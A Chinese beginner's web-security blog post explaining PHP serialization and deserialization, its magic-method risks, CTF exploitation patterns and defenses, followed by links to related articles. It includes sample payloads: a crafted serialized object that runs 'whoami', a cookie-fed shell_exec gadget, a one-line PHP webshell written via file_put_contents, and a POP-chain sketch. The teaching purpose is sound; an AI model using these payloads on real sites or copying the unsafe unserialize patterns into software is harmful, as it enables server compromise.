web安全入门学习笔记6——PHP序列化和反序列化

原创 于 2025-07-19 21:27:29 发布 · 338 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #学习 #笔记 #php

PHP序列化与反序列化通俗详解

基本概念比喻

想象你有​​一盒乐高玩具​​:

  • ​序列化​​:把搭建好的乐高模型拆解,所有零件按规则放入包装盒(变成字符串)
  • ​反序列化​​:按图纸从盒子里取出零件重新组装成模型(字符串变回对象)

一、序列化(Serialization)

将​​对象​​或​​数据结构​​转换成可存储/传输的字符串格式。

示例代码
class User {
    public $name = 'Hacker';
    private $id = 1001;
    protected $role = 'admin';
    
    public function showRole() {
        return $this->role;
    }
}

$user = new User();
$serialized = serialize($user);
echo $serialized;

输出结果

O:4:"User":3:{
    s:4:"name";s:6:"Hacker";
    s:7:"\0User\0id";i:1001;
    s:9:"\0*\0role";s:5:"admin";
}

格式解析:

  • O:对象(Object)
  • 4:类名长度("User")
  • "User":类名
  • 3:属性数量
  • s:4:"name":字符串属性,长度4,名称"name"
  • s:6:"Hacker":字符串值,长度6
  • s:7:"\0User\0id":私有属性格式 \0类名\0属性名
  • s:9:"\0*\0role":保护属性格式 \0*\0属性名

二、反序列化(Unserialization)

将序列化字符串还原为PHP对象或数据结构

$data = 'O:4:"User":3:{s:4:"name";s:6:"Hacker";s:7:"\0User\0id";i:1001;s:9:"\0*\0role";s:5:"admin";}';

$restored = unserialize($data);
echo $restored->showRole(); // 输出"admin"

三、安全风险:反序列化漏洞原理

危险根源:魔术方法

PHP在反序列化时会自动调用特殊方法:

魔术方法触发时机常见风险操作
__wakeup()反序列化后立即执行数据库连接/文件操作
__destruct()对象销毁时执行删除文件/写入日志
__toString()对象被当作字符串使用XSS/代码拼接
漏洞示例代码
class Dangerous {
    public $cmd;
    
    public function __destruct() {
        system($this->cmd);  // 对象销毁时执行系统命令
    }
}

// 攻击者构造的恶意序列化数据
$evil = 'O:9:"Dangerous":1:{s:4:"cmd";s:8:"whoami";}';

// 受害者反序列化恶意数据
$obj = unserialize($evil); // 此时对象创建

// 脚本结束时$obj自动销毁,触发__destruct()执行whoami命令

四、CTF中的典型利用方式

1. 直接命令执行
class Payload {
    function __wakeup() {
        echo shell_exec($this->cmd);
    }
}
unserialize($_COOKIE['payload']);
2. 文件操作(写webshell)
class WebShell {
    function __destruct() {
        file_put_contents(
            $this->filename, 
            '<?php system($_GET["cmd"]);?>'
        );
    }
}
// 序列化payload:设置filename=shell.php
3. POP链攻击

组合多个类的魔术方法实现复杂攻击:

class Database {
    public $connection;
    function __destruct() {
        $this->connection->exec($this->query);
    }
}

class Connection {
    public $sql;
    function exec($sql) {
        system($this->sql);
    }
}

// 构造链式触发:
// Database销毁 -> 调用Connection的exec -> 执行系统命令

五、防御措施

1、永远不要反序列化用户输入​

// 绝对禁用
unserialize($_POST['data']);

2、使用JSON等安全格式替代

// 安全做法
json_decode($_POST['data'], true);

3、限制可用类(PHP 7+)

$data = unserialize($serialized, [
    'allowed_classes' => ['SafeClass'] 
]);

4、严格校验数据

if(!preg_match('/^[a-z0-9]+$/', $data)) {
    die("Invalid data");
}

现实类比总结

  1. ​序列化​​:将武器拆解后放入快递箱
  2. ​反序列化​​:收件人重新组装武器
  3. ​漏洞​​:攻击者篡改零件,组装成定时炸弹
  4. ​防御​​:只接收信任来源的零件,严格验货

在CTF竞赛中,理解序列化机制是解决Web类题目的关键技能之一!

[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬师傅们(尤其出题解题的老师们)~
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
热门推荐
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
PHP序列化
柠檬木有枝
10-21 3029
基本概念 序列化: serialize() 将对象转变成一个字符串便于之后的传递与使用。 序列化会保存对象所有的变量,但是不会保存对象的方法。 反序列化: unserialize() 将序列化的结果恢复成对象。 反序列化一个对象,这个对象的类必须在反序列化之前定义,或者通过包含该类的定义或者使用 spl_autoload_register() (自动包含类)实现 序列化后格式: 布尔型...
php 序列化
rufeike的博客
11-06 279
文章目录PHP序列化变量序列化序列化函数 serialize()反序列化函数 unserialize()对象序列化 PHP序列化 变量序列化 定义: 序列化是将变量转换成可以保存或传输的字符串的过程; 反序列化就是在需要的时候把已序列化的字符串转换成变量的过程; 作用:序列化有利于数据的存储传输 序列化函数 serialize() 描述:把变量转换成一个可以存储的值; 语法:stri...
php中的序列化
reboot
12-14 588
php中的序列化
PHP序列化反序列化
2401_82985722的博客
06-05 2325
1.对象被创建时触发__construct()方法,对象使用完被销毁时触发__destruct()方法。2.对象被序列化时触发了__sleep(),字符串被反序列化时触发了__wakeup()//大写字母O表示对象,4是类名长度,test为类名,表示该类有3个成员属性。类型:长度:“值”…admin=admin,passwd=ctf时得到flag,序列化p。admin=admin,passwd=wllm得到flag,序列化p。4.$a->h()调用了不存在的方法触发了__call()方法。
Web安全入门学习笔记5——php语言基础
最新发布
sinat_36670976的博客
07-18 565
本教程快速介绍了PHP中与网络安全相关的重要知识。在CTF中,你会经常遇到上述漏洞类型。学习PHP安全,不仅要了解如何利用这些漏洞,还要知道如何防御。请继续深入学习PHP,并实践编写安全的代码。注意:在实际应用中,使用最新的PHP版本(避免已知漏洞)并遵循安全开发规范。
WEB安全学习笔记
chenrs727的博客
12-02 2226
基础入门 1.基础入门——基础概念 域名 什么是域名 域名(英语:Domain Name),又称网域,是由一串用点分隔的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时对计算机的定位标识(有时也指地理位置) 由于IP地址具有不方便记忆并且不能显示地址组织的名称性质等缺点,人们设计出了域名,并通过网域名称系统(DNS,Domain Name System)来将域名IP地址相互映射,使人更方便地访问互联网,而不用去记住能够被机器直接读取的IP地址数串。 比如www.bai
[网络安全自学篇] 四.实验吧CTF实战之WEB渗透隐写术解密
杨秀璋的专栏
08-06 1万+
上一篇文章分享了解BurpSuite工具的安装配置、Proxy基础用法,并分享一个简单的暴库案例;本篇文章分享实验吧CFT实战的题目,涉及WEB渗透隐写术常见题型,包括“这是什么”、“天网管理系统”、“忘记密码”、“false”、“天下武功唯快不破”“隐写术之水果、小苹果”。非常有意思的文章,作为在线笔记,希望对入门的博友们有帮助,大神请飘过,谢谢各位看官!
PHP序列化,反序列化
kuzemax的博客
08-07 1143
反序列化常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。
PHP序列化的概念
qq_60463414的博客
08-13 1564
PHP反序列化漏洞之PHP序列化概念
php 序列化方法,PHP多种序列化/反序列化的方法
weixin_32207033的博客
03-18 286
序列化是将变量转换为可保存或传输的字符串的过程;反序列化就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储传输数据,使程序更具维护性。1. serializeunserialize函数这两个是序列化反序列化PHP中数据的常用函数。$a=array('a'=>'Apple','b'=>'banana','c'=>'Coconut');//序...
渗透学习PHP--序列化
qq_62886656的博客
10-03 2944
渗透学习PHP--序列化
PHP序列化反序列化
qq_31088019的博客
08-25 4602
PHP序列化反序列化及案例
php php 序列化方法,PHP序列化的4种方法已公布,这是你PHP进阶之路必会的
weixin_39631350的博客
03-19 3980
【摘要】php作为一种编程软件,也能实现很多功能,不过今天环球网校的小编要为大家讲解PHP序列化的4种方法已公布,这是你PHP进阶之路必会的?看完这个代码你就明白了,因为只要你了解了PHP序列化的4种方法已公布,这是你PHP进阶之路必会的,你对于PHP7的了解就更深入了。在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型结构。本文讲述PHP序列化的四种方案,感兴趣的可以了解...
PHP序列化反序列化
weixin_40950781的博客
09-15 2424
PHP序列化反序列化0x00 前言0x01 PHP类与对象0x02 PHP Magic 方法0x03 PHP 对象序列化0x04 PHP对象反序列化0x05 PHP反序列化漏洞/PHP对象注入1)__destruct的运用实例2)加入反序列化的实例3)__toString()进行反序列化1.反序列化实例:2.用反序列化调用logFile类0x06 总结0x07 漏洞前提0x08 防御 0x0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值